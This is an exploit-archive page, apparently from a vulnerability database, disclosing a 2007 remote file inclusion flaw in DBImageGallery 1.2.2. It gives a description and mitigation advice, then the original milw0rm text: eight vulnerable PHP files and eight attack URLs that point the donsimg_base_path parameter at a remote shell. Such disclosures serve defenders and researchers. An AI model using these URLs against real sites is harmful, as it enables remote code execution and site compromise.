header-logo
Suggest Exploit
vendor:
DBImageGallery
by:
Denven
7.5
CVSS
HIGH
Remote File Inclusion (RFI)
CWE
Product Name: DBImageGallery
Affected Version From: DBImageGallery 1.2.2
Affected Version To: DBImageGallery 1.2.2
Patch Exists: NO
Related CWE: None provided
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

DBImageGallery 1.2.2 RFI Vulnerability

The DBImageGallery 1.2.2 script is vulnerable to remote file inclusion (RFI) attacks. By manipulating the 'donsimg_base_path' parameter in various PHP files, an attacker can include and execute arbitrary remote files, potentially leading to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software. Additionally, ensure that user input is properly validated and sanitized before being used in file inclusion operations.
Source

Exploit-DB raw data:

DBImageGallery 1.2.2
 
*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=1
*****************
ERROR:
 
admin/attributes.php                      require_once $donsimg_base_path
admin/images.php                          require_once $donsimg_base_path
admin/scan.php                            require_once $donsimg_base_path
includes/attributes.php                   require_once $donsimg_base_path
includes/db_utils.php                     require_once $donsimg_base_path
includes/images.php                       require_once $donsimg_base_path
includes/utils.php                        require_once $donsimg_base_path
includes/values.php                       require_once $donsimg_base_path
 
 
 
**************************************************************************************
RFI:
 
http://SITE.com/path/admin/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/scan.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/db_utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/values.php?donsimg_base_path=[SHELL]
 

**************************************************************************************
denven[at]gmail[dot]com

# milw0rm.com [2007-02-21]

Navigation

Suggest Exploit

Services By CQR